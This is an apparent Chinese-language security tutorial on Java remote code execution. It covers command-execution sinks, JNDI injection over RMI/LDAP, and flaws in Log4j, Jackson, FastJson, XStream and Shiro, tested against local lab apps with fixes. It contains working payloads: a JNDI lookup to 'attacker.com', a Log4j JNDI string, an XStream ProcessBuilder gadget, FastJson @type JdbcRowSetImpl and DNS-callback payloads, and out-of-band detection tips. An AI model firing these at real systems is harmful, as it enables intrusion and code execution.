WEB攻防-Java安全&JNDI&RMI&LDAP&五大不安全组件&RCE执行&不出网&不回显

目录

[1. RCE执行-5大类函数调用](#1. RCE执行-5大类函数调用)

[1.1 Runtime方式](#1.1 Runtime方式)

[1.2 Groovy执行命令](#1.2 Groovy执行命令)

[1.3 脚本引擎代码注入](#1.3 脚本引擎代码注入)

[1.4 ProcessImpl](#1.4 ProcessImpl)

[1.5 ProcessBuilder](#1.5 ProcessBuilder)

[2. JNDI注入(RCE)-RMI&LDAP&高版本](#2. JNDI注入(RCE)-RMI&LDAP&高版本)

[2.1 RMI服务中的JNDI注入场景](#2.1 RMI服务中的JNDI注入场景)

[2.2 LDAP服务中的JNDI注入场景](#2.2 LDAP服务中的JNDI注入场景)

攻击路径示例（以LdapTemplate为例）

[2.3 靶场案例](#2.3 靶场案例)

[2.4 JDNI注入利用条件](#2.4 JDNI注入利用条件)

[3. 不安全组件(框架)](#3. 不安全组件(框架))

[3.1 Log4j](#3.1 Log4j)

[3.2 Jackson](#3.2 Jackson)

[3.3 FastJson](#3.3 FastJson)

[3.4 XStream反序列化](#3.4 XStream反序列化)

[3.5 Shiro](#3.5 Shiro)

[4. 演示案例-白盒审计不安全组件漏洞](#4. 演示案例-白盒审计不安全组件漏洞)

[4.1 案例部署](#4.1 案例部署)

[4.2 FastJson](#4.2 FastJson)

[4.3 Log4J](#4.3 Log4J)

[5. 不回显常见判断通用方法：](#5. 不回显常见判断通用方法：)

---

1. RCE执行-5大类函数调用

RCE (Remote Code Execution), 远程代码执行漏洞，这里包含两类漏洞:

命令注入（Command Injection），在某种开发需求中，需要引入对系统本地命令的支持来完成特定功能，当未对输入做过滤时，则会产生命令注入

代码注入（Code Injection），在正常的java程序中注入一段java代码并执行，即用户输入的数据当作java代码进行执行。

这里主要是介绍java原生代码中常见的5大类函数调用命令/代码执行

1.1 Runtime方式

漏洞描述

远程命令执行漏洞，用户通过浏览器提交执行命令，由于服务器端没有针对执行函数做过滤，导致在没有指定绝对路径的情况下就执行命令

可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。

getRuntime()常用于执行本地命令，使用频率较高。

漏洞代码

// Runtime.getRuntime().exec(cmd)

public static String vul(String cmd) {
    StringBuilder sb = new StringBuilder();
    try {
        Process proc = Runtime.getRuntime().exec(cmd);
        InputStream fis = proc.getInputStream();
        InputStreamReader isr = new InputStreamReader(fis);
        BufferedReader br = new BufferedReader(isr);
     ...
                

安全代码-白名单方式

// 使用白名单替换黑名单。黑名单需要不断更新，而白名单只需要指定允许执行的命令，更容易维护。

public static String safe(String cmd) {
    // 定义命令白名单
    Set<String> commands = new HashSet<\>();
    commands.add("ls");
    commands.add("pwd");

    // 检查用户提供的命令是否在白名单中
    String command = cmd.split("\\s+")[0];
    if (!commands.contains(command)) {
        return "命令不在白名单中";
    }
    ...
}
  

1.2 Groovy执行命令

漏洞描述

* windows: "calc".execute()

* macos: "open -a Calculator".execute()

漏洞代码

// 不安全的使用Groovy调用命令

import groovy.lang.GroovyShell;
@GetMapping("/groovy")
public void groovy(String cmd) {
    GroovyShell shell = new GroovyShell();
    shell.evaluate(cmd);
}

直接调用calc.exe， execute()是Groovy中执行命令的方法

通过cmd执行calc（兼容性更好）

1.3 脚本引擎代码注入

漏洞描述

在Java 8之后ScriptEngineManager的eval函数就没有了

windows: var a = mainOutput(); function mainOutput() { var x=java.lang.Runtime.getRuntime().exec("calc")};

Payload绕过: var a = mainOutput(); function mainOutput() { var x=java.lang.\/****\/Runtime.getRuntime().exec("calc");}

漏洞代码

// 通过加载远程js文件来执行代码，如果加载了恶意js则会造成任意命令执行
// 远程恶意js: var a = mainOutput(); function mainOutput() { var x=java.lang.Runtime.getRuntime().exec("open -a Calculator");}
// ⚠️ 在Java 8之后移除了ScriptEngineManager的eval

public void jsEngine(String url) throws Exception {
    ScriptEngine engine = new ScriptEngineManager().getEngineByName("JavaScript");
    Bindings bindings = engine.getBindings(ScriptContext.ENGINE_SCOPE);
    String payload = String.format("load('%s')", url);
    engine.eval(payload, bindings);
}

解释： 在标准的浏览器环境或Node.js环境中，JavaScript本身并没有直接访问java.lang.Runtime类的方法，因为java.lang是Java的标准库包，与JavaScript无关。

然而，在Java的脚本引擎 （如Nashorn）环境中，情况就不同了。在这种环境中，JavaScript代码可以访问和执行Java代码，包括Java标准库中的类和方法，前提是这些类和方法对脚本引擎是可见的，并且没有受到安全策略的限制。

详细解释：

1. Java脚本引擎环境 ：
   • 当你在Java应用程序中嵌入JavaScript引擎（如Nashorn）时，JavaScript代码将在Java虚拟机（JVM）中执行。
   • 在这种环境中，JavaScript代码可以调用Java对象和方法，就像Java代码调用它们一样。
2. 访问java.lang.Runtime类 ：
   • java.lang.Runtime类是Java标准库中的一个类，提供了与应用程序运行时环境交互的方法。
   • 在Java脚本引擎中，如果未明确禁止脚本访问java.lang包，JavaScript代码就可以通过java.lang.Runtime类来访问运行时环境。
3. 调用getRuntime().exec()方法 ：
   • getRuntime()方法是java.lang.Runtime类的一个静态方法，返回一个Runtime对象，该对象表示当前的运行时环境。
   • exec()方法是Runtime类的一个方法，用于执行指定的系统命令。
   • 因此，在Java脚本引擎中，JavaScript代码可以通过java.lang.Runtime.getRuntime().exec("command")来执行系统命令。

在远程服务器创建1.js，代码如下：

var a = mainOutput(); function mainOutput() { var x=java.lang.Runtime.getRuntime().exec("cmd /c calc");}

• 代码通过var a = mainOutput();调用了mainOutput()函数。
• mainOutput()函数内部执行了java.lang.Runtime.getRuntime().exec("cmd /c calc")，启动了计算器应用程序。
• 变量a被赋值为mainOutput()函数的返回值（即undefined），但关键的系统命令执行已经发生。

1.4 ProcessImpl

漏洞描述

对于ProcessImpl类不能直接调用，但可以通过反射来间接调用ProcessImpl来达到执行命令的目的

该类非Public修饰，所以在不同包下只能通过反射的方式去调用执行。

漏洞代码

// ProcessImpl 是更为底层的实现，Runtime和ProcessBuilder执行命令实际上也是调用了ProcessImpl这个类
// ProcessImpl 类是一个抽象类不能直接调用，但可以通过反射来间接调用ProcessImpl来达到执行命令的目的

public static String vul(String cmd) throws Exception {
    // 首先，使用 Class.forName 方法来获取 ProcessImpl 类的类对象
    Class clazz = Class.forName("java.lang.ProcessImpl");

    // 然后，使用 clazz.getDeclaredMethod 方法来获取 ProcessImpl 类的 start 方法
    Method method = clazz.getDeclaredMethod("start", String[].class, Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class);

    // 使用 method.setAccessible 方法将 start 方法设为可访问
    method.setAccessible(true);

    // 最后，使用 method.invoke 方法来调用 start 方法，并传入参数 cmd，执行命令
    Process process = (Process) method.invoke(null, new String[]{cmd}, null, null, null, false);
}
     

解释：

Constructor<?> constructor = Class.forName("java.lang.ProcessImpl")
    .getDeclaredConstructor(
        String[].class,          // (1) 命令参数数组
        Map.class,               // (2) 环境变量映射
        String.class,            // (3) 工作目录路径
        ProcessHandle.class,     // (4) 进程句柄
        long.class               // (5) 本地进程ID
    );

参数详解：

1. String[].class
   • 作用：要执行的命令及其参数列表
   • 示例 ：new String[]{"ls", "-l", "/tmp"}
   • 注意：首个元素通常为可执行程序路径，后续元素为参数
2. Map.class
   • 作用：子进程的环境变量映射表
   • 类型 ：Map<String, String>
   • 示例 ：Map.of("PATH", "/usr/bin")
   • 注意 ：若传入null，将继承父进程的环境变量
3. String.class
   • 作用：子进程的工作目录绝对路径
   • 示例 ："/var/www"
   • 注意 ：若传入null，将继承父进程的工作目录
4. ProcessHandle.class
   • 作用：关联的进程句柄对象
   • 用途：用于获取进程PID、父进程信息、进程状态等
   • 示例 ：ProcessHandle.current()获取当前进程句柄
5. long.class
   • 作用：本地进程ID（Native PID）
   • 来源：由JVM底层创建进程时分配
   • 注意 ：通常传入-1L，表示由系统自动分配

1.5 ProcessBuilder

漏洞描述

Process类是一个抽象类（所有的方法均是抽象的），封装了一个进程（即一个执行程序）。

Process 类提供了执行从进程输入、执行输出到进程、等待进程完成、检查进程的退出状态以及销毁（杀掉）进程的方法。

ProcessBuilder.start() 和 Runtime.exec 方法创建一个本机进程，并返回 Process 子类的一个实例，该实例可用来控制进程并获取相关信息。

创建的子进程没有自己的终端或控制台。它的所有标准 io（即 stdin，stdout，stderr）操作都将通过三个流 (getOutputStream()，getInputStream()，getErrorStream()) 重定向到父进程，通过流的形式进行读取。

简单点说就是：ProcessBuilder和Runtime.exec()方法用于创建子进程，其参数处理机制存在安全隐患。当未经验证的外部输入直接拼接到命令字符串时，攻击者可注入恶意参数改变执行逻辑。

漏洞代码

// new ProcessBuilder(command).start()
// 功能是利用ProcessBuilder执行ls命令查看文件，但攻击者通过拼接; & |等连接符来执行自己的命令。

public static String processbuilderVul(String filepath) throws IOException {
    String[] cmdList = {"sh", "-c", "ls -l " + filepath};
    ProcessBuilder pb = new ProcessBuilder(cmdList);
    pb.redirectErrorStream(true);
    Process process = pb.start();

    // 获取命令的输出
    InputStream inputStream = process.getInputStream();
    BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
    String line;
    StringBuilder output = new StringBuilder();
    while ((line = reader.readLine()) != null) {
        output.append(line).append("\n");
    }
    return output.toString();
}

由于这是写的Linux的命令，所以换另一个平台javasec-0.0.1-SNAPSHOT.jar测试

漏洞代码

 public String ProcessBuilderExec(String ip, String safe, Model model) {
        if (safe != null) {
            if (Security.checkOs(ip)) {
                model.addAttribute("results", "检测到非法命令注入");
                return "basevul/rce/processbuilder";
            }
        }
//        String[] cmdList = {"sh", "-c", "ping -c 1 " + ip};
        String[] cmdList = {"cmd", "/c", "ping -n 1 " + ip};
        StringBuilder sb = new StringBuilder();
        String line;
        String results;

代码类似，这里通过safe开关来打开过滤，过滤代码：

    public static boolean checkOs(String content) {
        String black = "|,&,&&,;,||";
        String[] black_list = black.split(",");
        for (String s : black_list) {
            if (content.contains(s)) {
                return true;
            }
        }
        return false;
    }

未过滤时ip输入127.0.0.1 | calc

打开过滤

2. JNDI注入(RCE)-RMI&LDAP&高版本

JNDI（Java Naming and Directory Interface）是Java平台提供的命名与目录服务接口 ，它的核心作用是通过统一的API访问各种命名/目录服务（如LDAP、DNS、RMI等）。其设计初衷是为分布式系统提供统一的资源定位服务。通过InitialContext.lookup()方法，开发者可以透明地访问各种命名/目录服务。

简单来说，JNDI就像是一个"通讯录"，Java程序可以通过它查找和获取远程服务资源。

**RMI：**是Java原生支持的远程调用方法协议，允许一个Java虚拟机（JVM）中的对象调用另一个JVM中对象的方法，适用于分布式系统中组件间的通信。

服务端：注册远程对象

// 定义远程接口
public interface IRemoteService extends Remote {
    String sayHello(String name) throws RemoteException;
}

// 实现远程对象
public class RemoteServiceImpl extends UnicastRemoteObject implements IRemoteService {
    public RemoteServiceImpl() throws RemoteException {}

    @Override
    public String sayHello(String name) {
        return "Hello, " + name;
    }
}

// 注册到RMI Registry
public class RMIServer {
    public static void main(String[] args) throws Exception {
        IRemoteService service = new RemoteServiceImpl();
        Registry registry = LocateRegistry.createRegistry(1099);
        registry.bind("RemoteService", service);
        System.out.println("RMI服务已启动");
    }
}

客户端：通过JNDI查找并调用

public class RMIClient {
    public static void main(String[] args) throws Exception {
        Hashtable<String, String> env = new Hashtable<>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");
        env.put(Context.PROVIDER_URL, "rmi://localhost:1099");
        
        Context ctx = new InitialContext(env);
        IRemoteService service = (IRemoteService) ctx.lookup("RemoteService");
        System.out.println(service.sayHello("World"));  // 输出: Hello, World
    }
}

RMI会优先调用本地存在的方法，没有才会调用远程提供的方法

**LDAP：**轻量级目录访问协议 ,常用于用户认证、组织信息查询等。

关键字	英文全称	含义
dc	Domain Component	域名的部分，其格式是将完整的域名分成几部分，如域名为example.com变成dc=example,dc=com（一条记录的所属位置）
uid	User Id	用户ID songtao.xu（一条记录的ID）
ou	Organization Unit	组织单位，组织单位可以包含其他各种对象（包括其他组织单元），如"oa组"（一条记录的所属组织）
cn	Common Name	公共名称，如"Thomas Johansson"（一条记录的名称）
sn	Surname	姓，如"许"
dn	Distinguished Name	"uid=songtao.xu,ou=oa组,dc=example,dc=com"，一条记录的位置（唯一）
rdn	Relative dn	相对辨别名，类似于文件系统中的相对路径，它是与目录树结构无关的部分，如"uid=tom"或"cn= Thomas Johansson"

风险本质上是攻击者通过构造恶意JNDI引用，诱导应用加载远程类库并执行恶意代码。这种攻击往往结合反序列化漏洞、日志注入等场景，形成攻击链。

2.1 RMI服务中的JNDI注入场景

类名	方法	调用场景	风险描述
org.springframework.transaction.jta.JtaTransactionManager	readObject()	反序列化	未过滤的JNDI名称可导致注入
com.sun.rowset.JdbcRowSetImpl	execute()	数据库操作	dataSourceName参数未校验
javax.management.remote.rmi.RMIConnector	connect()	JMX连接	RMI地址参数未做白名单控制
org.hibernate.jmx.StatisticsService	setSessionFactoryJNDIName()	JMX配置	直接设置未验证的JNDI名称

攻击路径示例（以JdbcRowSetImpl为例）

注入点：

String payload = "rmi://attacker.com/Exploit";
JdbcRowSetImpl rs = new JdbcRowSetImpl();
rs.setDataSourceName(payload); // 未校验的输入

触发点：

rs.execute(); // 内部调用lookup()加载RMI服务

2.2 LDAP服务中的JNDI注入场景

类名	方法	调用场景	风险描述
javax.naming.directory.InitialDirContext	lookup()	LDAP查询	未过滤的查询参数
org.springframework.ldap.core.LdapTemplate	lookup()	LDAP操作	动态构建的查询语句

攻击路径示例（以LdapTemplate为例）

注入点：

String baseDn = "${userInput}"; // 用户可控输入
LdapTemplate template = new LdapTemplate(contextSource);
template.lookup(baseDn, new MyAttributesMapper());

触发点：

template.lookup(...); // 内部调用InitialDirContext.lookup()

漏洞代码

2.3 靶场案例

// lookup是通过名字检索执行的对象，当lookup()方法的参数可控时，攻击者便能提供一个恶意的url地址来加载恶意类。

public void vul(String content) {
    try {
        Context ctx = new InitialContext();
        ctx.lookup(content);
    } catch (Exception e) {
        log.warn("JNDI错误消息");
    }
}

使用工具生成payload

jndi本身不是漏洞，是java用来远程加载文件执行从而造成一个RCE的结果，一般是在漏洞利用的时候会使用这个jndi注入达到一个RCE目的。

安全代码 - 正则拦截

public String safe(String content) {
    // 使用正则表达式限制参数
    if (content.matches("^[\\w\\.-]+$")) {
        try {
            Context ctx = new InitialContext();
            ctx.lookup(content);
        } catch (Exception e) {
            log.warn("JNDI错误消息");
        }
        return HtmlUtils.htmlEscape(content);
    } else {
        return "JNDI 正则拦截";
    }
}

安全代码 - 白名单拦截

public String safe2(String content) {
    List<String> whiteList = Arrays.asList("java:comp/env/jdbc/mydb", "java:comp/env/mail/mymail");
    if (whiteList.contains(content)) {
        try {
            Context ctx = new InitialContext();
             ctx.lookup(content);
         } catch (Exception e) {
             log.warn("JNDI错误消息");
         }
        return HtmlUtils.htmlEscape(content);
    } else {
        return "JNDI 白名单拦截";
    }
}

更新jdk版本，能起到一定的防御作用，但不能完全有效，最终还是在于编写安全代码

JDK 6u211、7u201、8u191之后：增加了com.sun.jndi.ldap.object.trustURLCodebase选项，默认为false，禁止LDAP协议使用远程codebase的选项，把LDAP协议的攻击途径也给禁了。

2.4 JDNI注入利用条件

如果对方使用的更高版本去部署，rmi和ldap都可能失败，及时漏洞存在，可能会接受到请求class文件，但不会成功执行

Tomcat 8+ or SpringBoot 1.2.x+部署也会存在注入

高版本绕过可参考：

8u191后的JNDI注入利用 - Atomovo - 博客园

如何绕过高版本JDK的限制进行JNDI注入利用 -- KINGX

3. 不安全组件(框架)

3.1 Log4j

Apache的一个开源项目，是一个基于Java的日志记录框架。

Log4j2默认支持解析ldap/rmi协议（只要打印的日志中包括ldap/rmi协议即可），并会通过名称从ldap服务端其获取对应的Class文件，并使用ClassLoader在本地加载Ldap服务端返回的Class类。

这就为攻击者提供了攻击途径，攻击者可以在界面传入一个包含恶意内容的ldap协议内容（如：${jndi:ldap://localhost:9999/Test}），

该内容传递到后端被log4j2打印出来，就会触发恶意的Class的加载执行（可执行任意后台指令），从而达到攻击的目的。

历史漏洞：https://avd.aliyun.com/search?q=Log4j

本地javasec案例

漏洞代码：

// log4j-core < 2.15.0-rc1

public String vul(String content) {
    logger.error(content);
    return "Log4j2 RCE";
}
 

工具生成payload

实际情况弹出计算机calc操作是在服务端弹出的，我们没有回显，所以测试的时候用dnslog做带外就知道是否可以出网了

修复方案：

方案一、升级版本
升级Apache Log4j所有相关应用到>= Log4j-2.15.0官方稳定版本
方案二、临时缓解（选其一）

● 版本>=2.10.0， 修改jvm参数，添加-Dlog4j2.formatMsgNoLookups=true

● 版本>=2.10.0， 代码中配置System.setProperty("log4j2.formatMsgNoLookups", "true")，重新打包jar包

● 版本>=2.10.0， 修改配置文件log4j2.component.properties ：log4j2.formatMsgNoLookups=True

注意：临时缓解对Log4j <= 2.9版本是无效的，因为在2.10版本之前并没有引入这些变量来控制 lookup()。

3.2 Jackson

主要负责处理Json的序列化和反序列化。

Jackson-databind 支持 Polymorphic Deserialization 特性（默认情况下不开启），当 json 字符串转换的 Target class 中有 polymorph fields，即字段类型为接口、抽象类或 Object 类型时，

攻击者可以通过在 json 字符串中指定变量的具体类型 (子类或接口实现类)，来实现实例化指定的类，借助某些特殊的 class，如 TemplatesImpl，可以实现任意代码执行。

CVE-2020-xxxx:Jackson-databind RCE两则

影响范围：

• jackson-databind before 2.9.10.4
• jackson-databind before 2.8.11.6
• jackson-databind before 2.7.9.7

利用条件：

• 开启enableDefaultTyping()
• 使用了com.nqadmin.rowset.JdbcRowSetImpl第三方依赖
• 

漏洞概述：

com.nqadmin.rowset.JdbcRowSetImpl类绕过了之前jackson-databind维护的黑名单类，并且JDK版本较低的话，可造成RCE。

3.3 FastJson

阿里巴巴公司开源的json解析器，它可以解析JSON格式的字符串，支持将JavaBean序列化为JSON字符串，也可以从JSON字符串反序列化到JavaBean。

3.4 XStream反序列化

XStream是一个轻量级、简单易用的开源Java类库，它主要用于将对象序列化成XML（JSON）或反序列化为对象。

XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞，但是其 1.4.16 及之前版本黑名单存在缺陷，攻击者可利用sun.rmi.registry.RegistryImpl_Stub构造RMI请求，进而执行任意命令。

历史上存在多个反序列化漏洞。

<!--payload-->
<sorted-set>
    <dynamic-proxy>
        <interface>
            java.lang.Comparable
        </interface>
        <handler class="java.beans.EventHandler">

            <target class="java.lang.ProcessBuilder">
                <command>
                    <string>calc</string><!--执行的命令-->
                </command>
            </target>

            <action>start</action>

        </handler>
    </dynamic-proxy>
</sorted-set>

3.5 Shiro

Java安全框架，能够用于身份验证、授权、加密和会话管理。

强特征：数据包有标识字样： Remember-me

在登录时发现发送失败，返回空指针报错问题

检查发现是前端和后端的参数名错了，导致remember值为null造成的，把后端shoir.java的大写M改为小写重新打包就行

获取请求url

使用工具利用

4. 演示案例-白盒审计不安全组件漏洞

4.1 案例部署

1.执行sql文件

2.以项目打开pom.xml文件的方式在idea导入项目

3. 重载一下maven，他会根据pom.xml去重新下载包3.

4.修改数据库连接用户和密码然后启动项目

http://127.0.0.1:8088/tmall/

4.2 FastJson

在pom文件中可以看到引入了FastJson1.2.58的包

关键函数：JSON.parseObject()

项目中搜索该函数

可以看到在添加产品中使用了 JSON.parseObject()，后端接口admin/product下产品属性参数propertyJson是通过FastJson解析的

登录后台，账号/密码:admin/123456

添加一个产品并抓包

dnslog带外测试：使用上面javasec的payload发现是被修复过的，报错说不支持autoType,1.2.25版本以上默认关闭autotype，不允许反序列化时动态加载类{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://pxnskqelcn.yutu.eu.org","autoCommit":true}

利用 java.net.Inet [4 | 6] 地址

版本范围：1.2.24-1.2.83

{"@type":"java.net.Inet4Address","val":"vlcffimauq.lfcx.eu.org"}

想继续利用没有成功，也没找到1.2.58绕过的payload

网上找到一些dnslog的payload，没全测部分可用

{"zeo":{"@type":"java.net.Inet4Address","val":"dnslog"}}

{"@type":"java.net.Inet4Address","val":"dnslog"}

{"@type":"java.net.Inet6Address","val":"dnslog"}

{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}

{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}

{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}

Set[{"@type":"java.net.URL","val":"dnslog"}]

Set[{"@type":"java.net.URL","val":"dnslog"}

{{"@type":"java.net.URL","val":"dnslog"}:0

4.3 Log4J

重点关注 Logger.xxx，且引用了变量

|-----------|------------------|--------------------------------------|
| TRACE | logger.trace() | 用于记录最详细的日志信息，通常用于调试非常细粒度的程序行为。 |
| DEBUG | logger.debug() | 用于记录调试信息，帮助开发者在开发和测试阶段排查问题。 |
| INFO | logger.info() | 用于记录一般性的运行信息，表示程序的正常运行状态。 |
| WARN | logger.warn() | 用于记录警告信息，表示可能存在的问题，但程序仍能继续运行。 |
| ERROR | logger.error() | 用于记录错误信息，表示程序出现了问题，但不一定导致程序崩溃。 |
| FATAL | logger.fatal() | 用于记录严重错误信息，表示程序遇到了无法恢复的错误，可能会导致程序崩溃。 |

全局搜索

可以看到后台接口admin/uploadAdminHeadImage,文字上看是头像上传，上传文件抓包把文件名改为payload

调出计算器

5. 不回显常见判断通用方法：

1、直接将命令执行结果写入到静态资源文件里，如html、js等，然后访问。存在这个文件不就说明命令执行能够执行了。

2、通过dnslog进行数据外带，但如果无法执行dns请求就无法验证了。